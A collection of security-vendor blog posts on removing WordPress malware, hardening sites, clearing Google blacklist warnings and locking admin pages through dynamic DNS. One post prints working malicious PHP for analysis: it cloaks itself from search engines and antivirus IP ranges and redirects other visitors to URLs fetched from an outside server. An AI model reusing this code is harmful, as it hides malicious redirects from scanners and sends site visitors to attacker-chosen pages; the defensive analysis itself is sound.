Website Malware Removal – WordPress Tips & Tricks

We often write posts that give you advice and recommendations around how to harden your websites, and have only recently begun to give advice on ways to navigate your backend and remove infections via terminal. But what about all the basics?

That’s what I want to cover in this post. All those things that you should know when trying to remove web malware from your site.

Cleaning Basics


When working to clean your site there are a number of things you should know. I’ll wrap them up into four key areas:

  • Use Live Scanners
  • Default WP File Structure
  • File Permissions
  • Disabling Plugins

1. Use Live Scanners

Contrary to popular belief, utilizing web-based scanners is a necessity in this day and age. False positives are an acceptable risk in today’s fight against web malware; they are much better than false negatives, which amount to missing a possible infection.

Of course, there aren’t many live scanners out there on the market, and fewer still that are truly free and will give you a report without asking for a registration or payment of some kind:

Disclaimer: No scanner is 100% accurate. No AV-type product should ever boast 100% certainty, as it’s not possible in this domain. If it were, there wouldn’t be any competitors or service providers.

2. Default WP File Structure

What most don’t understand is how WordPress is organized by default, and it’s an important distinction to make. In every install, there are core directories and files.

This is what a clean install looks like:

One option you have is to do your own integrity checks by comparing your install to a clean core install. As you might imagine, there is a way to do this via terminal. Here is an example:

$ diff -r /Documents/WordPress/wp-includes /public_html/happysite.com/wp-includes
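To see what that comparison buys you, here is a toy demonstration; the directory names and the injected line are invented for illustration. Any file that deviates from the pristine copy is flagged:

```shell
# Build a pristine copy and a "live" copy, then tamper with the live one.
mkdir -p pristine/wp-includes local/wp-includes
echo '<?php // core code' > pristine/wp-includes/version.php
cp pristine/wp-includes/version.php local/wp-includes/version.php
echo '<?php @eval($_POST["x"]); // injected' >> local/wp-includes/version.php

# -q reports only *which* files differ -- handy for a first pass.
# (diff exits non-zero when differences are found, hence the || true)
diff -rq pristine/wp-includes local/wp-includes || true
```

Anything diff reports is a file you need to inspect by hand.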

Why important?

It’s important because in more cases than most folks realize, you’ll want to replace your core install.

The reasoning is simple. From what we see, in a lot of infections, once access is gained to the environment, backdoor payloads are pushed into the install directories. This allows the crackers to gain access to your environment directly. If you don’t have the ability to effectively scan every directory for known or new backdoors, then it’s good practice to replace the two core directories, wp-admin and wp-includes.

Please note the emphasis on replace, not update. This is important because an update will simply overwrite the existing files; it will not purge the directory. This means that if a backdoor resides in a file that isn’t part of the core set, the update won’t clear the issue.

Hint: SEO Spam is notorious for doing this.
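The difference is easy to demonstrate in the terminal. This is a toy sketch (the directory and file names are made up for illustration) showing that an overwrite leaves a planted backdoor in place, while a purge-and-copy removes it:

```shell
# Set up a "clean" source tree and an "infected" install.
mkdir -p clean/wp-includes infected/wp-includes
echo '<?php // core' > clean/wp-includes/load.php
echo '<?php // core' > infected/wp-includes/load.php
echo '<?php @eval($_POST["x"]);' > infected/wp-includes/backdoor.php

# "Update" = overwrite in place: the backdoor survives.
cp -a clean/wp-includes/. infected/wp-includes/
ls infected/wp-includes    # backdoor.php is still listed

# "Replace" = purge, then copy: the backdoor is gone.
rm -rf infected/wp-includes
cp -a clean/wp-includes infected/wp-includes
ls infected/wp-includes    # only load.php remains
```

Back up the directory before you purge it, in case you need to refer to the infected copy later.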

3. File Permissions

The ever important file permissions. The WordPress.org Codex offers some very good advice on specific permissions for WordPress installs. You can find a good article on the Codex: Changing File Permissions

The biggest take-away is simple:

  • Directories: 755
  • Files: 644

There is a simple way to apply the changes via terminal:

Directories:
$ find [path to install] -type d -exec chmod 755 {} \;

Files:
$ find [path to install] -type f -exec chmod 644 {} \;
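Once applied, you can verify the result with the same find command inverted. Shown here on a throwaway directory so the whole thing is reproducible:

```shell
# Build a tiny tree, apply the recommended permissions, then verify.
mkdir -p demo/wp-content/uploads
echo '<?php' > demo/index.php
echo '<?php' > demo/wp-content/uploads/file.php

find demo -type d -exec chmod 755 {} \;
find demo -type f -exec chmod 644 {} \;

# These should print nothing: anything listed still deviates from 755/644.
find demo -type d ! -perm 755
find demo -type f ! -perm 644
```

On a real install, point both finds at your web root instead of the demo directory.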

But what about the non-terminal types?

No problem. Using your favorite FTP client you should be able to do it easily. In this instance I’ll show you in FileZilla. While I wouldn’t save credentials in the client, I’d recommend it for most people working over FTP.

What I particularly like about it is that you can use this client across the three most common platforms (Mac, Windows, Linux).

To change the permissions for all directories it’s easy: simply log into your server and click on the directory for your web files. It can be www, public_html, htdocs, httpdocs, etc.

Once at the directory, right-click and click on properties.

On the next screen you can type in 755 where it says Numeric value.

Be sure to also click Recurse into subdirectories and select Apply to directories only.

This will apply the 755 permission to all directories within the web directory.

The good news is that the file permissions are just as easy. Simply follow the same steps as above, this time though you’ll type 644 and select Apply to files only.

As you can see, there is no real secret here. Simply follow the recommendations you are given.

Another important note to make is that in FileZilla you can easily see the permissions of your directories and files by looking to the far right of the directory or file, see below:

4. Disable Plugins

Here is another good tip. When using a scanner, if you continue to struggle to identify the location of the infection, one very common place to look is the plugins directory.

What most people don’t realize is that you have the option to disable the plugins directory. Don’t be fooled by the use of “disable”; it simply means you can’t use the plugins. One very easy way to do this is to rename the directory:

Example: plugins -> plugins.backup

This will kill all your plugins rendering them useless to your website. The point of doing this is to see if the infection is tied to the plugins. If it is, you’ll see that the live scanners will show clean when you rescan. If this is the case, another very good trick is to narrow down the infection further by disabling one plugin at a time.

Yes, this works and it’s very easy to do for novices.

Note: No, renaming is not going to hurt your site. When you reset the name to its default, the site will be fully functional again.
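In the terminal the whole dance looks like this (the plugin names here are made-up examples):

```shell
# Disable everything at once by renaming the plugins directory.
mkdir -p wp-content/plugins/hello-dolly wp-content/plugins/some-gallery
mv wp-content/plugins wp-content/plugins.backup
mkdir wp-content/plugins    # empty directory keeps WordPress happy

# Re-enable one plugin at a time, rescanning between each move,
# to isolate which plugin carries the infection.
mv wp-content/plugins.backup/hello-dolly wp-content/plugins/
ls wp-content/plugins
```

When you find the culprit, move the clean plugins back and deal with the dirty one.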

If you disable plugins and the infection is still present, then you know it’s in one of the following: core files, theme files, or the database. If you followed the steps in section 2, then you know it’s in either the themes or the database.
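If you’ve ruled out plugins and core, grep is the quickest way to interrogate the remaining suspects. A sketch, using an invented marker string in place of whatever your scanner flagged:

```shell
# Plant a marker in a toy theme tree so the search has something to find.
mkdir -p wp-content/themes/twentytwelve
printf '<?php echo "flagged-string";' > wp-content/themes/twentytwelve/footer.php

# -r recurses, -l prints only the names of files that match.
grep -rl 'flagged-string' wp-content/themes/

# If the themes come up clean, dump and grep the database instead, e.g.:
# mysqldump -u user -p dbname | grep -i '<script'
```

The mysqldump line is illustrative; swap in your own credentials and the string your scanner reported.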


This post is not meant to be a technical overview of how to remove website malware; instead, it’s meant to help you diagnose the location of infections, which in turn helps you locate and remove them. It’s fundamentally a different approach, but it’s intended to be so. Believe it or not, the most novice of users would be able to use these techniques to quickly narrow down infections.

If you have any questions please contact us at info@sucuri.net.

Website Malware Removal – Counter.php

There are many variations to the Counter.php malware floating around the interwebs. This is a malicious redirect that sends your readers to a known bad site, that site houses a payload that responds based on the incoming user-agent.

Check out Sucuri Labs for more variations of Counter.php


If you use our free SiteCheck Scanner you might see a display like this:

Read More

Website Malware Removal – Blackhole Exploit

Here is a quick little write-up on how to deal with one of the many variations of the Blackhole Exploit.

The Infection


If you scan your site using Sucuri SiteCheck and find yourself with a result that looks like this:

Then you are dealing with an infection that is facilitated through the use of the Blackhole Exploit kit; the infection is classified as a Drive-by-Download.

As the type implies, when someone visits a site with this payload, the infection is initiated on visit and, if the conditions are correct, it will attempt to download something onto the visitor’s local environment. Hence the classification.

Another option you have, if you feel the site is functioning funny, is to leverage your terminal environment. On UNIX/Linux-based machines you have the option to use cURL as follows:

$ curl -A "Googlebot" www.infectedsite.com

In this instance you’d see this:

Same infection as what was presented in the SiteCheck results.

The Removal Process


In this specific instance the infection was found across all the following files:

  • index.php

This includes the root, theme directory, plugins directory, and the admin and includes directories. Every one of those directories had an index file and each file was infected; I mention that to show the scope of the infection.
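A quick way to gauge that scope yourself is to enumerate every index file under the install. Shown here on a mocked-up tree; on a real site, run the find from your web root:

```shell
# Mock up the directory layout described above.
mkdir -p site/wp-admin site/wp-includes site/wp-content/themes/demo
touch site/index.php site/wp-admin/index.php \
      site/wp-includes/index.php site/wp-content/themes/demo/index.php

# List every index file; each one is a candidate for inspection.
find site -name 'index.php' -o -name 'index.html'
```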

Hunt The Infection

If you have terminal access to the environment you can quickly identify every file infected by running the following:

$ grep -r '72.81.840.918.256' .

If you’re in a rush and your site is very deep, you could also push the results of the grep to a log file versus waiting for it to display and check back later:

$ grep -r '72.81.840.918.256' . > infectedsite-infection

This will create the infectedsite-infection file in the directory you are in. Once you have time you can come back and analyze the output:

$ cat infectedsite-infection

If you don’t have terminal, don’t sweat it; you can often download the entire install to your local environment and run the search there too. When you’re satisfied you have found and cleaned all the offending files, simply push them back to your server.

Now Clean it Up

When you’re cleaning, you don’t have to be a coding rockstar, but you want to be aware of the little things. By little things I mean this:

  • If you’re in a PHP file, you’re going to need an opening tag, which usually looks like this: <?php, followed by a closing tag that looks like this: ?>

In this instance, this was the most important to keep in mind.

As for the removal, when you look at the results in SiteCheck or your cURL results you see everything fits inside <script> and </script>.

There are a few ways to automate the removal, but that won’t be covered here. The easiest way for you is to open the files from the steps above, find the infection, highlight, and delete.

Be careful that you don’t remove any of the important characters I mentioned above.

For opening the files you have a few different options: you can use terminal editors or a local text editor (e.g., Coda, Notepad, TextPad, etc.). If you don’t want to mess with any of that, well then good news: simply sign up with us and we’ll take care of it for you.


Any questions or concerns with the post just let us know at info@sucuri.net.

Google Blacklist Warning: Something’s Not Right Here!

Google recently put out a post looking back at the past 5 years of the Safe Browsing program, which we summarized in a post titled: Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately?

This got us thinking about the number of Google warnings end-users see every day, and naturally we couldn’t help but take some time to provide context around the different warnings and what they mean.

Today it seems there are 5 little words that all end-users are quickly learning to fear when it comes to owning a website:

Courtesy of Chrome

It’s important to note that every browser displays the warning a bit differently. Very frustrating to us and clients, but good to recognize.

Courtesy of Firefox

Courtesy of Safari

What Does it Mean?

What most don’t realize is that Google has a number of different warnings, and they don’t all mean the same thing. If you are greeted with one of the warning splash pages above, that’s what it is: your site is infected and you should be concerned. This page is reserved to warn all users visiting your site that Google has in fact confirmed that your site is either (1) distributing malicious software, whether via drive-by-downloads, social engineering attacks, etc., or (2) redirecting users to malicious domains or IPs that are in turn distributing malicious software.

I know, nothing screams panic more than a page that is bright RED and forces your client to click proceed anyway or ignore warning to access your website. It’s like saying:

Hey, you’ll likely get mugged if you go in that alley.

The odds of your clients and readers disregarding the message grow slimmer every day. What makes it worse is that Google offers an API that most anti-virus products leverage. This API is updated with the state of your site in the Google Safe Browsing program. What this in turn means is that if your site gets blacklisted, that state is pushed to the API, which in turn is reported by the AVs. In short, if your client is using a product from one of these AV vendors, it too will warn the user that something is wrong.

Now, it’s easy to say, “buy our product to avoid what is quickly being recognized as the web’s scarlet letter A,” but in addition to saying that, we want to raise awareness around what you can do if you in fact find yourself with this problem.

Know The Warning


The first thing is to understand which warning you are seeing. There are three types of warnings Google releases. They include:

  • Malicious Software (Malware)
  • Suspicious Activity
  • Phishing

Malicious Software (Malware)

Perhaps the easiest to identify. These are the warnings posted above. They are usually red splash pages and annoying as heck; what’s worse is they have this way of significantly impacting your website’s traffic.

Suspicious Activity

Most don’t realize this, but when you use Google search, all the results you see are known as Search Engine Result Pages (SERPs). If Google detects something it feels to be inconsistent with your site, it will display a little warning titled:

This site may be compromised!!

This is perhaps the most frustrating because, unlike Malware and Phishing attempts, it’s treated differently. It’s Google saying it thinks something is amiss. You’ll often find this warning on sites with the Pharma Hack. Please understand, though, that clearing this warning can be painful, as the process is slightly different than for its blacklisting counterparts.

Phishing

If you read our post on the past 5 years with Google’s Safe Browsing program you’ll notice an interesting trend where Phishing attempts are increasing while malware is decreasing according to Google. With that, it’s only appropriate for Google to put together yet another glaring splash page to warn its users of something being wrong. If you find yourself curious as to how Phishing scams work HowStuffWorks offers a good and easy to understand description.

With an understanding of which warning you are being flagged with, and yes, it could be all three, you can then put together an appropriate course of action.

Course of Action


The really good news is that it’s only temporary. We get this question a lot: “Is this going to be there forever?” The answer, fortunately, is no. It’s a temporary warning to the users of the site, and if you take appropriate actions it’ll be removed. The first thing to know is the various sites you’ll need:

Here is a quick tip:

You don’t have to hire a company like Sucuri to have these warnings removed.

No company has an advantage over another in getting your site cleared by Google. Google is the only one with the ability to reindex and make the final determination on the state of the site. This means that if you are able to effectively clear the infection, then there is nothing stopping you from submitting for reconsideration on your own.

Here is another quick tip:

When dealing with Google warnings, the best place to go to know the status is Google itself. Do not depend on scanners, as they use the Safe Browsing API and that is often delayed.

With this information in hand you can now work to assess where the issue is. It’s often in your interest to identify the issue before submitting for reconsideration; not doing so will simply leave you stressed and frustrated. It’s important to note that sometimes, though, Google does make mistakes, and it could be a false positive.

Step 1. Use Live Scanners / Online Tools

Contrary to popular belief, not all scanners are created equal. More often than not, scanners use some level of caching and/or require you to subscribe to a service to get an output worth anything. Make use of free scanners where possible:

Live scanner:

These free scanners are not 100% accurate; it’s practically impossible. In reality, no remote service is 100% accurate. If they were, there wouldn’t be a need for any other vendors. That being said, it’s good to note that some malware types are conditional and present themselves only when specific rules are met. Read more in one of our recent posts, Understanding Conditional Malware – IP Centric Variation. To account for this you can use a number of tools to emulate different conditions in the hopes of replicating the issue.

Online tools:

The idea is to try to figure out what might have flagged the issue in the first place. Using the Google Bot option is always good, as it will display the site as it is being seen by Google. This is especially important for those infections that target Google IPs.

Step 2. Remove the Issues

As in most things, knowing is only half the battle. Now that you know, you want to go in and remove the issue.

Please have a basic understanding of coding syntax; the last thing you want to do is blow up your site because you deleted a closing bracket.

Please also note that the infection may be encoded, encrypted, concatenated or a little bit of everything. In other words, what you see via the web might not be what you see when you log into your server. With that being said there are a few known places you can always look when hunting down issues:

Some of the more common places to look when dealing with drive-by-downloads:

  • Footer
  • Header
  • Index (php or html)
  • template files

More common places for malicious redirects include:

  • .htaccess
  • index (php or html)
  • Core Files

When dealing with Phishing attempts:

  • New Directories
  • HTML files
  • Index (php or html)

Another good tip: although Google Webmaster Tools might say myhapylizard.html and mykidsplaying.html are showing infected, in reality it’s the core file generating the content for those files that is the culprit. Looking only at those HTML files is not going to bear you much fruit. Look at the files generating the template for that page; there you’re likely to find the root of the problem. You’ll also want to know what your website is built on. Is it using a CMS like WordPress, Joomla, Drupal, or osCommerce? Is it custom?

If you’re familiar with the command line interface (CLI) you can also try using a few different commands.

Emulate user agents:

$ curl -A "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0)" http://www.somesite.com

Where you can switch out the agent MSIE 7.0; Windows NT 5.0 at your leisure. It’s always good to check IE as it’s one of the more likely targeted browsers. If you go online and try searching for user agents it could be a bit overwhelming. Until you get familiar with them, here is a sweet little list that will help you get going. Simply replace the content in the user agent section of the cURL command.

You can also use cURL to emulate a number of bots and other crawlers.

Emulate bots:

$ curl --location -D - -A "Googlebot" somesite.com

If you’re wondering why you would ever use cURL in place of your browser, the answer is simple: you don’t want to visit a compromised site and run the risk of compromising your own environment. You’re going to want some understanding of how your website was developed and, at a minimum, a basic understanding of HTML. To help you out, you’re looking for things that might contain something like the following:

  • iframe
  • script

You’re also going to look for things that don’t make sense:

  • Is your site English, but you see Russian writing? Or any language not your own?
  • Do you see long strings of incomprehensible content?

Once you do that you’ll want to become friends with grep. Sample use would be:

$ grep -r '[something of interest]' .

Grep is extremely powerful and allows you to crawl your entire environment. It allows you to pick out pieces of text and search for them in every file on your server. Be sure to check out the 15 tips on how to use the command. Another good resource to help you get acclimated in the terminal environment includes this free online resource.
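A few grep variations come up again and again in cleanups. The patterns below are common examples, not a definitive signature list, and the scratch directory is seeded just so the commands have something to find:

```shell
# Seed a scratch directory with a suspicious-looking file.
mkdir -p hunt
printf '<?php eval(base64_decode("aGk="));' > hunt/suspect.php

grep -rl 'base64_decode' hunt    # file names only
grep -rn 'eval(' hunt            # file:line:match, for context
grep -rc 'base64_decode' hunt    # match count per file
```

Start with -l to build a hit list, then use -n on each file to see the matches in context.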

Step 3. Submit For Review

If you made it through Step 2 then you’re likely pretty pumped right now, and you should be. The only thing left to do is submit to Google for reconsideration. Regardless of which warning you’re fighting with, you’re going to do some type of reconsideration submission. For all of them, you’ll need to log into Google Webmaster Tools and verify your site.

For malicious software (Malware) and Phishing warnings you will submit the reconsideration request via Google Webmaster Tools by:

  1. Add Site
  2. Verify Site
  3. Click on the Health option – Hint: left-side table of contents
  4. Click on Malware – Hint: if being flagged for Phishing or Malware you’ll see a yellow / orange warning on the page when you click
  5. Click to submit a review

For suspicious activity you’ll follow these steps:

  1. Add Site
  2. Verify Site
  3. Go to the Reconsideration Link
  4. Select your site from the drop-down
  5. Fill in the input boxes, providing as much information as possible

After both, the best thing you can do is sit back and wait. This is a patience game. In most instances you’ll see an update within 10 hours, but in some instances it has been known to take days or, rarely, weeks. Also, be sure to keep an eye on your Google Webmaster account; you’ll see update notices there and in your email.

If you get to the point where you have exhausted all your resources and can’t manage to get the infection removed, then it’d be in your interest to engage with a malware remediation company like Sucuri. If you decide on another provider, that’s ok too; just be sure to read our Ask Sucuri: What should I know when engaging a Web Malware Company? post.


If you have any questions on the content in this post please feel free to leave a comment or send us an email at info@sucuri.net.

How To: Lock Your Site by Enabling a Second Layer of Authentication

I put together a post this weekend about my personal experience installing a WordPress site on a clean server. In the process of hardening the administration panel I found myself doing something that I don’t see discussed much – enabling Basic Access Authentication.

That got me thinking about putting together this post, which will help educate our readers on a quick and easy method that can add a second layer of authentication to their own administrative panels. What’s great about this is it can be applied to any web application that is running on an Apache HTTP Server; those platforms include:

  • WordPress
  • Joomla
  • Drupal
  • osCommerce
  • and more…


Read More

Understanding Conditional Malware – IP Centric Variation

In today’s web malware landscape you can’t help but take a minute to familiarize yourself with a concept known as conditional malware.

As implied in the name, it’s malware that only works when specific rules are met. Those rules can range from specific IP ranges to the time of day. They are very tricky and, as you would expect, evolve every day. Often when someone calls or sends us an email asking why we’re not picking something up on our free scanner, SiteCheck, that’s the reason. As of late, the PHARMA hack has become notorious for the use of conditional-type infections, making it exceptionally difficult to detect via HTTP.

In this post we’ll take a look at a specific type of conditional malware that applies specific rules around which IPs it will not display to. It’s the same string that we wrote about earlier, causing us to flag Google.com as malware.. oops.. :)

My goal is to keep it high level, not going to get crazy with the code, but I do want to take some time to walk through it so that you can learn to detect similar infections in your environment.

Dissecting The Code


User Agents

The first thing you notice when you see the infection is the use of $user_agent_to_filter. This tells the code which user agents to filter: if the request comes from any one of these user agents, it is handled differently, as you’ll see in the condition further down:

$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#Safari#i', '#HTTrack#i', '#Chrome#i', '#Mac#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i', '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i', '#www\.cys\.ru#i', '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i', '#CFNetwork#i', '#ConveraCrawler#i', '#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i', '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i', '#IRLbot#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
'#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
'#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
'#Yandex#i', '#Yanga#i', '#Yeti#i', '#msnbot#i', '#spider#i', '#yahoo#i', '#jeeves#i', '#google#i', '#altavista#i',
'#scooter#i', '#av\s*fetch#i' ) ;

Filtering IPs

The next thing you notice is the long array of IPs. In essence, if your request comes from an IP that equals one of these values, or even fits within one of the ranges, a different action will occur. How nice of them to actually comment on those ranges that belong to search engines and anti-virus providers.

$stop_ips_masks = array(
"66\.249\.[6-9][0-9]\.[0-9]+", // Google NetRange: 66.249.64.0 – 66.249.95.255
"74\.125\.[0-9]+\.[0-9]+", // Google NetRange: 74.125.0.0 – 74.125.255.255
"65\.5[2-5]\.[0-9]+\.[0-9]+", // MSN NetRange: 65.52.0.0 – 65.55.255.255,
"74\.6\.[0-9]+\.[0-9]+", // Yahoo NetRange: 74.6.0.0 – 74.6.255.255
"67\.195\.[0-9]+\.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 – 67.195.255.255
"72\.30\.[0-9]+\.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 – 72.30.255.255
"38\.[0-9]+\.[0-9]+\.[0-9]+", // Cuill: NetRange: 38.0.0.0 – 38.255.255.255
"93\.172\.94\.227", // MacFinder
"212\.100\.250\.218", // Wells Search II
"128\.103\.64\.[0-9]+", // StopBadWare
"150\.70\.[0-9]+\.[0-9]+", // TrendMicro
"216\.104\.[0-9]+\.[0-9]+", // TrendMicro
"207\.46\.[0-9]+\.[0-9]+", // Microsoft
"157\.55\.[0-9]+\.[0-9]+", // Microsoft
"213\.180\.[0-9]+\.[0-9]+", // Yandex
"217\.23\.[0-9]+\.[0-9]+", // Kaspersky
"91\.103\.64\.[0-9]+", // Kaspersky
"215\.5\.80\.[0-9]+", // Kaspersky
"195\.168\.53\.[0-9]+", // NOD32
"220\.255\.1\.[0-9]+", // domain-tool.com
"69\.28\.58\.[0-9]+", // Symantec
"66\.147\.244\.[0-9]+", // freepcsecurity.co.uk
"128\.111\.48\.[0-9]+", // wepawet.cs.ucsb.edu
"209\.9\.239\.[0-9]+", // jsunpack.jeek.org
"62\.67\.194\.[0-9]+", // support.clean-mx.de
"195\.214\.79\.[0-9]+", // support.clean-mx.de
"97\.74\.141\.[0-9]+", // malwareurl.com
"213\.171\.194\.[0-9]+", // spamhaus
"139\.146\.167\.[0-9]+", // malwaredomains
"88\.160\.229\.[0-9]+", // malwaredomains
"69\.162\.79\.[0-9]+", // malwarebytes
"66\.40\.145\.[0-9]+", // bitdefender
"66\.223\.50\.[0-9]+", // bitdefender
"204\.14\.90\.[0-9]+", // spywarewarrior.com
"92\.123\.155\.[0-9]+", // Sophos
"213\.31\.172\.[0-9]+", // Sophos
"143\.215\.130\.[0-9]+", // Malwaredomainlist
"150\.70\.172\.[0-9]+", // TrendNet
"64\.88\.164\.[0-9]+", // AVG
"102\.157\.192\.[0-9]+", // ZeusTracker
"109\.65\.41\.[0-9]+", // ZeusTracker
"110\.77\.248\.[0-9]+", // Virustotal
"59\.6\.145\.[0-9]+", // Virustotal
"67\.124\.37\.[0-9]+", // Virustotal

The Rule (a.k.a. The Condition)

If Condition is Met, then..

Once the user agents have been defined and the “bad” IPs flagged, you then have the condition. In this instance, what it is saying is: if the request matches any of the IPs or user agents identified above, redirect it to http://www.google.com. How annoying is that!

foreach ( $stop_ips_masks as $k=>$v )
{
if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']) )
$is_bot = TRUE ;
}
if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) )
{

header("Location: http://www.google.com/");
die();

If Condition is Not Met, then…

Now that we know what it does if the condition is met, let’s look at what it does if the condition is not met.

set_time_limit(30);

$cache = dirname(__FILE__) . '/link.cache';

$link = @file_get_contents($cache);

if (strlen($link) < 20 || (time()-@filemtime($cache)) > 60)
{
$link = @file_get_contents('http://88.198.28.38/api.php?action=link&aid=658&fid=3714&hash=beca79b043b1b5e25d514191ce8a691c291b8626');

if (strlen($link) > 20)
{
$fp = @fopen ($cache, 'w');
@fputs($fp, $link);
@fclose($fp);
}
}

header ('Location: ' . $link);
exit;

As you can see, if the condition is not met, then the incoming request continues down the yellow brick road and arrives at a new domain, courtesy of this:

@file_get_contents('http://88.198.28.38/api.php?action=link&aid=658&fid=3714&hash=beca79b043b1b5e25d514191ce8a691c291b8626');

That little API defines which URL to share with the request. It actually rotates the domains, so if you hit it multiple times you’re not likely to get the same one.

What Did We Learn


Hopefully you gained an appreciation for what conditional malware is all about and the challenges with catching it via HTTP crawlers.

This specific instance only talks to one type; there are varying permutations of this floating around the interwebs. If you’re a client, we highly recommend enabling the server-side scanner, as it’s not restricted to the limitations found with HTTP crawlers.

A couple of telltale signs that something is wrong are comments like these:

  • I am being redirected on my mobile device but not on my machine
  • I am being redirected in my Chrome browser but not in Firefox
  • I remember seeing something a day ago but now it’s not there

Keep an eye out for questions or comments that resemble any of those points; if you hear them, you now know that you’re likely dealing with some type of conditional malware.


If you have any questions pertaining to this post please feel free to email us at info@sucuri.net.

How To: Stop The Hacker By Hardening WordPress

Every day we service hundreds of clients and the question is always asked:

“How do you stop these hackers?!”

Unfortunately, it’s perhaps the hardest thing to explain and for most to understand. That being said, this post will be one of a series that talks about what end-users can do to help reduce their threat landscape.

This post will augment our previous post, Ask Sucuri: “How to Stop The Hacker and ensure Your Site Is Locked!!”, but hopefully provide you more tangible takeaways. It will also leverage guidance recently shared at a conference for WordPress enthusiasts – WordCamp Orange County 2012.

The Presentation


Here is the presentation in its entirety. Very appropriately, it’s titled WordPress Security – Knowledge is Power, mainly because of the emphasis we put around empowering the end-user with as many tools as possible to make them more effective at protecting themselves.

Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime. – Chinese proverb


Read More

How To: Lock Down WordPress Admin Panel With a Dynamic IP

There is often a lot of discussion around locking down access to WP-ADMIN and WP-Login.php, especially around restricting it by IP. The retort that often comes up is, “but what if I have a dynamic IP?” Right away the response from folks is, “oh, well then this won’t work for me.” It didn’t click at the time, but then it hit us: that doesn’t make any sense.

This post will teach you how you can lock down access to WP-ADMIN and WP-Login.php by domain name instead of by IP, giving you the same level of protection that you would expect when restricting by IP.

Using .HTACCESS


The first place you will start is inevitably .HTACCESS. The basic commands you insert are the following:

Lock Down Log In Page

This is often dropped in the .HTACCESS file at the root of your install. This small snippet is often what you would write:

#Secure Access to WP-LOGIN.PHP by IP
<Files wp-login.php>
Order Deny,Allow
Deny from All
Allow from [Your IP]
</Files>

One very small change and we’re off to the races with domain names in the place of IP:

#Secure Access to WP-LOGIN.PHP by Domain Name
<Files wp-login.php>
Order Deny,Allow
Deny from All
Allow from [Your Domain Name]
</Files>

Yes, a domain name, don’t worry it’ll make more sense as we go through this post.

Lock Down WP-ADMIN Access

The key here is to place this .htaccess inside the WP-ADMIN directory. This small snippet is often what you would write:

# Secure Access to WP-ADMIN by IP
<FilesMatch ".*">
Order Deny,Allow
Deny from All
Allow from [Your IP]
</FilesMatch>

One very small change and we’re off to the races with domain names in the place of IP:

#Secure Access to WP-ADMIN by Domain Name
<FilesMatch ".*">
Order Deny,Allow
Deny from All
Allow from [Your Domain Name]
</FilesMatch>

Yes, a domain name, don’t worry it’ll make more sense as we go through this post.

What do you mean Domain Name?

So this is where it gets fun, and we have not heard many people chat or write about it in this community. As we know, a domain name is nothing more than a human-readable label for an IP, which is what DNS servers use to map out everything and anything that touches the internet. So the idea is simple…

Use a domain name to identify your local machine. But how is this done, you ask? Simple. You use a service that binds a domain name to the IP of your local environment. Uh…
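To see this name-to-IP mapping in action, you can resolve any hostname right from a terminal. A minimal sketch, using localhost because it resolves on any machine; once your dynamic DNS record is set up (e.g. the hypothetical testsubdomain.mooo.com used later in this post), swap it in to check your own record:

```shell
#!/bin/sh
# Resolve a hostname to its IP. "localhost" resolves everywhere;
# replace it with your dynamic DNS name to check your own record.
getent hosts localhost
```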

Using a Dynamic DNS Manager

If you’re still scratching your head, don’t fret, we’re going to walk you through the process here so that you don’t have to give it much thought.

This is what you have to do…

Step 1. Sign up with a Dynamic DNS Manager

Again, nothing to be concerned with here, you’re not looking at spending $100s. There are actually a number of free services available to you, they include:

The rest of this post will focus on Afraid.org, mainly because the name is cool and it works very well. Please don’t be put off by the presentation of the site; their strong suit obviously is not user experience or branding, but that’s ok, because it works.

You can sign up by following this link: http://freedns.afraid.org/signup/

Once you’re logged in, you’ll see the following:

Once signed up, you’ll have to wait for the verification email before you can start using the system.

Step 2. Configure Your Domain

Once you get the verification email, you can follow the link it provides and open a new session. The new page will have a link in the middle that says Add a subdomain.

Go ahead and Add a subdomain.

The interface it presents you with is pretty straightforward.

The three areas you want to focus on include:

  • Subdomain
  • Domain
  • Destination

You really don’t need to understand this, but what it’s doing is giving you a free subdomain on any one of the available public domains (i.e., the domains in the drop-down list).

So from this example I have selected the following:

  • Subdomain – testsubdomain
  • Domain – Mooo.com
  • Destination – 1.1.1.1

It should look something like this:

Don’t worry about placing too much emphasis on the Destination. I just set it to 1.1.1.1 because it’ll be updated later by your machine. In short, this is the IP that gets applied to the domain.

In case you didn’t catch it, my new domain is testsubdomain.mooo.com.

Once you have that, click Save.

Step 3. Configure with your Local Machine

This is by far the easiest step, although all the steps have been simple.

Simply click on Dynamic DNS in the left-hand table of contents. Your screen should look something like this:

Once here, you have a couple of options, but the easiest one, and the one I like, is the Direct URL option.

When you click it, it won’t open in a new window, so be sure to use command + click or control + click so that it opens in a new window.

Doing that then takes the IP of your local machine and applies it to the domain. So if your local IP is 173.56.201.45, the IP of the domain now becomes 173.56.201.45. This is key if you think back to the .htaccess configuration changes recommended above.

Step 4. Save URL

Might go without saying, but be sure to save the Direct URL link.

You will use this link every time your local IP changes.
